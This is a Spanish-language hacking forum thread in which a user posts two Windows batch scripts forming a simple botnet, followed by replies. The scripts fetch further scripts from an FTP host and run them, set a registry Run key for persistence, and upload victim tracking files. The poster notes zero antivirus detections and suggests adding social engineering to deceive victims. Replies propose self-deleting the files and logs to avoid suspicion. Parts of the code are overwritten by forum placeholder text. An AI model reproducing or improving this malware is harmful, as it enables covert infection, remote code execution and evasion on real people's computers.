comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Botnet sencila [Batch]

  • 6 Respuestas
  • 3438 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 874
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« en: Agosto 15, 2015, 11:10:46 am »
Buenas a todos, vengo a traeros una botnet sencilla 'programada' entera con batch.

Son varios archivos, el primer archivo va a ser este, que lo que hace es descargarse el Fecha.bat (Encargado de contar los pcs y ejecutar el 3º archivo que será el que dé las ordenes definitivas). A este archivo se lo pueden añadir cosas como ingeniería social para engañar a alguien.

Código: DOS
  1. @No tienes permisos para ver links. Registrate o Entra con tu cuenta off
  2.  
  3. No tienes permisos para ver links. Registrate o Entra con tu cuenta C:\Users\%username%
  4.  
  5. No tienes permisos para ver links. Registrate o Entra con tu cuenta ruta=%CD%
  6.  
  7. rem Prepara el archivo que controla las máquinas infectadas.
  8.  
  9. No tienes permisos para ver links. Registrate o Entra con tu cuenta numero=%random%
  10.  
  11. No tienes permisos para ver links. Registrate o Entra con tu cuenta %numero% > numero.txt
  12.  
  13. getmac > %numero%
  14.  
  15. No tienes permisos para ver links. Registrate o Entra con tu cuenta ftp.txt
  16. No tienes permisos para ver links. Registrate o Entra con tu cuenta open host >> ftp.txt
  17. No tienes permisos para ver links. Registrate o Entra con tu cuenta userdown >> ftp.txt
  18. No tienes permisos para ver links. Registrate o Entra con tu cuenta passdown >> ftp.txt
  19. No tienes permisos para ver links. Registrate o Entra con tu cuenta get Fecha.bat >> ftp.txt
  20. No tienes permisos para ver links. Registrate o Entra con tu cuenta quit >> ftp.txt
  21.  
  22. start /min ftp -s:ftp.txt
  23.  
  24. reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v winReg32 /t REG_SZ /d %ruta%\Fecha.bat
  25.  

SHA256: 14b4db4fcb1778e4ee709d200b1b60db91e5dde5062ca3abcab66233eaa35907 
Nombre: Malware.bat
Detecciones: 0 / 56 
Fecha de análisis: 2015-08-15 13:53:25 UTC ( hace 1 minuto ) 

El Segundo archivo sería el que se encarga de descargar e iniciar un tercer archivo que se ejecutaría, además contabiliza los pcs infectados.

Código: DOS
  1. @No tienes permisos para ver links. Registrate o Entra con tu cuenta off
  2.  
  3. rem Crea un txt con la fecha y hora actual.
  4.  
  5. rem Lee el número del archivo numero.txt
  6.  
  7. No tienes permisos para ver links. Registrate o Entra con tu cuenta /f "tokens=*" %%x No tienes permisos para ver links. Registrate o Entra con tu cuenta (numero.txt) No tienes permisos para ver links. Registrate o Entra con tu cuenta (
  8. No tienes permisos para ver links. Registrate o Entra con tu cuenta nombre=%%x
  9. No tienes permisos para ver links. Registrate o Entra con tu cuenta escribir
  10. )
  11.  
  12. :escribir
  13.  
  14. rem Escribe el archivo
  15.  
  16. No tienes permisos para ver links. Registrate o Entra con tu cuenta ----------------- >> %nombre%
  17. No tienes permisos para ver links. Registrate o Entra con tu cuenta fecha: %date% >> %nombre%
  18. No tienes permisos para ver links. Registrate o Entra con tu cuenta hora: %time% >> %nombre%
  19.  
  20. rem Envía el archivo.
  21.  
  22. No tienes permisos para ver links. Registrate o Entra con tu cuenta ftp.txt
  23. No tienes permisos para ver links. Registrate o Entra con tu cuenta ftp1.txt
  24. No tienes permisos para ver links. Registrate o Entra con tu cuenta open host >> ftp.txt
  25. No tienes permisos para ver links. Registrate o Entra con tu cuenta userfecha>> ftp.txt
  26. No tienes permisos para ver links. Registrate o Entra con tu cuenta passfecha>> ftp.txt
  27. No tienes permisos para ver links. Registrate o Entra con tu cuenta put %nombre% >> ftp.txt
  28. No tienes permisos para ver links. Registrate o Entra con tu cuenta quit >> ftp.txt
  29.  
  30. start /min ftp -s:ftp.txt
  31.  
  32. rem Ejecuta el archivo que he subido
  33.  
  34. No tienes permisos para ver links. Registrate o Entra con tu cuenta open host >> ftp1.txt
  35. No tienes permisos para ver links. Registrate o Entra con tu cuenta userdown>> ftp1.txt
  36. No tienes permisos para ver links. Registrate o Entra con tu cuenta passdown>> ftp1.txt
  37. No tienes permisos para ver links. Registrate o Entra con tu cuenta get eject.bat >> ftp1.txt
  38. No tienes permisos para ver links. Registrate o Entra con tu cuenta quit >> ftp1.txt
  39.  
  40. start /min ftp -s:ftp1.txt
  41.  
  42. timeout /t 15
  43.  
  44. start eject.bat

SHA256: 62b766ad33d7bea8959d463b44909b0d37ba61963cd8ad1e32f57e4547954456 
Nombre: Fecha.bat
Detecciones: 0 / 56 
Fecha de análisis: 2015-08-15 14:04:47 UTC ( hace 0 minutos ) 

Los timeout los pongo porque el host que utilizo es lento,

En cuanto a las cuentas ftp hice dos y dos carpetas diferentes, una carpeta para las descargas, que solo pueda descargar, para eject.bat y fecha.bat y otra carpeta llamada Infectados con otra cuenta que solo puede subir archivos.

Acepto ideas y criticas

!Saludos¡

Rollth
Buen hacker mejor persona.
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado blackdrake

  • *
  • Moderator
  • Mensajes: 1910
  • Actividad:
    15%
  • Reputación 15
    • Ver Perfil
« Respuesta #1 en: Agosto 15, 2015, 04:51:01 pm »
Nada mal @No tienes permisos para ver links. Registrate o Entra con tu cuenta, doy por hecho que lo has programado tu no?

Saludos.



Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 874
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #2 en: Agosto 15, 2015, 05:35:05 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Nada mal @No tienes permisos para ver links. Registrate o Entra con tu cuenta, doy por hecho que lo has programado tu no?

Saludos.

@No tienes permisos para ver links. Registrate o Entra con tu cuenta si, lo he programado yo, es sencillo pero puede servir.


Rollth
Buen hacker mejor persona.
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado roadd

  • *
  • Underc0der
  • Mensajes: 118
  • Actividad:
    0%
  • Reputación 2
    • Ver Perfil
    • Hacking Desde Cero By Roadd Dogg
  • Skype: r0add@hotmail.com
  • Twitter: @RoaddHDC
« Respuesta #3 en: Agosto 15, 2015, 08:14:24 pm »
Me encanta la idea y el programa! :D
No te estas dando cuenta pero de a poco vas programando modularmente un buen y completo troyano
Web: No tienes permisos para ver links. Registrate o Entra con tu cuenta
Igm: /secureart
Telegram: @roaddhdc
Correo: r0add@hotmail.com
Face: /roaddhdc
Twitter: @roaddhdc
Youtube: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado xxneeco83xx

  • *
  • Underc0der
  • Mensajes: 46
  • Actividad:
    0%
  • Reputación 0
  • ASM/C/C++/VB/Delphi
    • Ver Perfil
    • Email
  • Skype: nico.buzzi
« Respuesta #4 en: Agosto 15, 2015, 11:33:50 pm »
muy bueno ROLLTH.
Como sugerencias e ideas, como tu mismo dijiste que aceptabas, se me ocurre
que un solo batch genere al resto de los demás batch, y así mismo los valla borrando junto con los logs que envía luego de haberlos enviado
de esa forma seria mas fácil la infección y menos sospechoso que quedaran logs sueltos :)
El arte de crear malware, es algo que solo pocos entienden!


Desconectado rollth

  • *
  • Underc0der
  • Mensajes: 874
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
    • Ver Perfil
    • Whateversec
    • Email
  • Twitter: @RoloMijan
« Respuesta #5 en: Agosto 16, 2015, 05:17:49 am »
Muchas gracias @No tienes permisos para ver links. Registrate o Entra con tu cuenta

@No tienes permisos para ver links. Registrate o Entra con tu cuenta Te refieres a que en lugar de descargarlo lo genere el otro? Si es eso, si es una buena idea, voy a ver...

Rollth
Buen hacker mejor persona.
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado xxneeco83xx

  • *
  • Underc0der
  • Mensajes: 46
  • Actividad:
    0%
  • Reputación 0
  • ASM/C/C++/VB/Delphi
    • Ver Perfil
    • Email
  • Skype: nico.buzzi
« Respuesta #6 en: Agosto 16, 2015, 05:21:39 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Muchas gracias @No tienes permisos para ver links. Registrate o Entra con tu cuenta

@No tienes permisos para ver links. Registrate o Entra con tu cuenta Te refieres a que en lugar de descargarlo lo genere el otro? Si es eso, si es una buena idea, voy a ver...

claro, que un solo batch valla generando el resto.
y a medida que cada batch secundario termine de ejecutarse se elimine.
así evitarías problemas.
El arte de crear malware, es algo que solo pocos entienden!


 

¿Te gustó el post? COMPARTILO!



Underc0de Tools | Raven Botnet V1.0

Iniciado por q3rv0

Respuestas: 45
Vistas: 20512
Último mensaje Enero 21, 2015, 08:15:52 am
por Snifer
Botnet Ricard (BANK) BY CAMPEX

Iniciado por campex

Respuestas: 2
Vistas: 1605
Último mensaje Diciembre 09, 2014, 02:11:22 pm
por campex
Ender Botnet v1.0 by Baku

Iniciado por ANTRAX

Respuestas: 1
Vistas: 1955
Último mensaje Octubre 04, 2014, 03:16:20 pm
por Baku
Spacenet-Python Botnet

Iniciado por lucky1234

Respuestas: 2
Vistas: 1043
Último mensaje Febrero 13, 2018, 02:16:16 pm
por Spaceb4r
Neutrino v3.6 - Botnet Bancaria

Iniciado por ANTRAX

Respuestas: 3
Vistas: 3394
Último mensaje Febrero 28, 2016, 10:47:06 am
por Stiuvert